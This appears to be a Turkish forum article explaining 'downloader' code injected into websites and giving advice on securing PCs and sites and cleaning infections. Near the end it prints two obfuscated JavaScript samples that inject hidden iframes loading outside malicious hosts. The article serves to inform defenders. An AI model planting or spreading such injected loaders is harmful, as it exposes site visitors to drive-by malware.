Nedir Bu Kodlar ? Ne ise Yariyorlar ?


Yazan : CashAsiq

Site : Param Yok Acamiyorum



Merhaba Arkadaslar , Gun Gectikce sitelerinde kendi koymadigi kodlari goren ve bu kodlardan etkilenenlerin

sayisi artmaktadir. Bu Konuda bilgilendirme amacli bildigim kadari ile bildiklerimi size anlatmaya calisicam.



A) Bu Kodların Adı Nedir ?


Genel Olarak sitelerimize kimligi belirsiz kisiler tarafindan yerlestirilen kodlara Downloader Denmektedir.


B) Bu Kodlar Ne is Yapar ?

Cesitli Criptolama Sekilleri ile encode edilirler ve Antivirüsler ve Browserverlari asarak sisteme istedikleri

dosyalari indirip calistirirlar yahutta sistemde istedikleri komutlari calistirirlar.


C)Nasil Korunurum ?

C - 1 ) Sahip Oldugum Pc Yi Nasil Korurum ?

internette dolasirken girdigimiz sitelerin sourcelerinde ne tur kodlarin oldugunu cogumuz bilemeyiz.Bu Sebeple
girdigimiz yerlere eklenmis bir takım kodlar sistemimize bir cesit malware sokabilir, yahut herhangi bir donanı
mımızı yakabilir.Kısacasi Bize Zarar Verebilir.Pc mizi bu tip saldirilardan korumak icin ilk olarak saglam bu
konuda kendini ispat etmis antivirüsler kullanmaliyiz.Ornek Olarak Avast,Kaspersk,Avg Bunlarin herhangi birini
kullanirsaniz surekli updatelerinizi yaparsaniz.Potansiyal olarak korunuyorum Diyebilirsiniz.Fakat Daha bitmedi.
Cunku bu antivirüs yazilimlarinin tanimadigi yani undetect spy,trojen,keylogger gibi malwareler sistemimize
girebilir. O zaman sunu diyebilirsiniz " Ulan O zaman hic Kullanmayalim .. nn Antisini " Kullanmadiginiz zaman
lamer die hitap edilen kesimin standart ordan burdan copy teknikleri altinda savunmasiz kalirsiniz o sebeple
anti sart.Gelelim undetectlerden nasi kurtulucaz? Downloaderlarin Kodlari arasinda kullanilan kodlarin cogunda
<script> , <iframe> , gibi belli basli oradan buradan resim video yahut bir baska sayfa cekmeye yarayan kodlari
disable konuma sokan bir sistem yani bahsettigim zıggm " No Script " evet no script Mozilla Firefoxun Bir Addounu
Firefoxu bu addon ile kuruyoruz.Gerekli ayarlarini yapiyoruz.Ve Pcmizi bu sayede sahip oldugumuz browserver+addonu
ve antivirüsleriniz ile koruyoruz.Opera Sevenler simdi laf edebilir Yaw Kardes Haklısın ama operada Var onuda Kulla
nabilirsiniz Die Evet opera da kullanabilirsiniz. Gayet Kullanisli No Script addonu kadar olmasada kendi icinde
blockerlari mevcut.

C - 2 ) Web Sitemi Nasil Korurum ?

Web Sitenize Kodlar ya pc nize yediginiz bir Zararli Dosya, Serverinizin Guvenlik Problemi yahutta Arkadasiniza verdiginiz ftp
passlarinin kotu yollarda kUllanilmasi ile yerleşir. Pc icin Olani Yukarda Anlattik. Arkadas icin Olanina bisi yapamam. Gelelim Server
uzerinden olana Server Guvenligi onemlidir.Bir gun kalkar tum scriptlerinizde farklı indexler abus sabuk yazilar yahutta ftpnizin bos
oldugunu gorurseniz.Kalp Krizi gecirebilirsiniz.(Yedeklerini Alan insanlar haric).Nasil bir Guvenlik Problemi Olabilirki ?
Soyle Olabilir Bir Sekilde Serverda Yetki Saglayan bir insan Serverdaki Farklı Dizinlere Gecebilir eger gerekli guvenlik onlemleri alinma
missa.Server Sahipleri Servarlarinin Guvenliginden Sorumlu Kardes bu beni ilgilendirmez derseniz Zarar gorebilirsiniz. Musterinin iyisi
Kullangibi sistemdeki aciklari sahibine ileten patch yazan ' ıdir. Kullandiginiz Sistemin Safe Mode : On , Php Surumune Ait Patchler Yapil
mis mi Sistem Surume Ait Local Exploit Varmi varsa Test Edilmis mi. Yahut Patch Yapilmis Mi. Bunlari Server Sahibine İletin. Sonrasinda
Kullanginiz Scriptlerde herhangi bir xss,rfi,sql gibi buglar varmi bunlari arastirin.Evet Bunlari Yaptigimiz Zaman Bana G0re %70 koruruz
Kendimizi %100 Diyemem Kimsede Diyemez Zaten.Sebebinide Herkez Kendi biliyor Zaten.

D 1 ) Kardes Sitemde Bir Ton Kod Var ( Bu Kodlardan Suan Nasibimi Aldim Senin Yazini Okumadim Diyenler )

KArdeslerim Simdi Telaslanmak Yok. Hemen Farklı Bir Pc ye Geciyoruz. Temiz oldundan Emin Oldugumuz Panel Sifrelerimizi Değişiyoruz
iste plesk,cpanel ftp iste ne varsa. Sonra Kullandigimiz Scriptleri temiz bilgisayara indiriyoruz. Ve Tum sayfalari tariyoruz. O kodlarin bulungudu
sayfalari not alip temizliyoruz sayfalari sonra tekrar upload ediyoruz Serverimiza . 1 - 2 Saat Bekliyoruz Sonrasinda Sitelerde Tekrar o kodlar gorunu
yorsa Server Kaynakli bir problemimiz vardir.Hemen İlgili kimse ona muracat ediyoruz.

Kardes Vallahi yaptim oldu farklı pc Den degismedi Kodlar. Diyorsaniz Kullandiginiz Sisteme bir malware bulasmistir. Sisteminize guzel bir format
atiyosunuz Sonrasinda web browserver olarak opera yahut firefox+noscipt addonu kullaniyorsun.Bunlarin yaninda avast,avg,kaspersky bunlarin birinden
antivirüs kuruyorsun.İe Kullanmiyorsun Ve Sorun Halloluyor.

D 2 ) Ornek Versene Kardes Bir Kactane Kod Olarak Merak Ettim Diyenler


--


<script>eval(unescape("%77%69%6e%64%6f%77%2e%73% 74 %61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6 d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61% 6d%65%20%6e%61%6d%65%3d%32%66%65%33%20%73%72%63%3d %5c%27%68%74%74%70%3a%2f%2f%77%77%77%2e%70%6f%6b%7 5%70%6b%69%32%34%2e%69%6e%66%6f%2f%31%34%2f%69%6e% 64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f %75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%2 9%2a%33%36%32%32%34%29%2b%27%62%35%31%62%30%5c%27% 20%77%69%64%74%68%3d%35%36%36%20%68%65%69%67%68%74 %3d%36%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6 c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72% 61%6d%65%3e%27%29")); </script>



--


"status=' ';zz='o';sl='/';sf='ram';us='t';pi='b';po='.';gw='fi';qu=':';yh= 'a';vo='n';bw='e';pj='m';iu='s';pt='tp';yw='c';ab= 'src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf ,ko);xx=dg.concat(pt,qu,sl,sl,iu,us,yh,pi,hh,zz,zz ,pj,po,yw,vo,sl,gw,hh,bw,sl);var oE=document.createElement(t);oE.setAttribute('widt h','0');oE.setAttribute('height','0');oE.setAttrib ute('style','display:none');oE.setAttribute(ab,xx) ;document.body.appendChild(oE);


--

Vs Gibi Ornekleri Cogaltilabilir.Evet Arkadaslar Burada Dokumanima Son Veriyorum Sonlara Dogru biraz saldim galiba yazilari Belki Sagopadan Tanri Cekti Tum Resimleri
Dinliyor oldugumun verdigi Duygudandir.Ama Neyse Varsa Sozlerimizde Bir Hata Simdiden Affola Nacizane birkac bildiğimizi anlattik iste.Surada Kullanirsaniz
Sitemi De Yazin diyemiyorum Cunku oyle bir Sitem yok Neyse Kullandiginiz Yerlerde CashAsiq Dan Alintidir. Derseniz Güzel Olur Gercekten. Saglicakla Kalın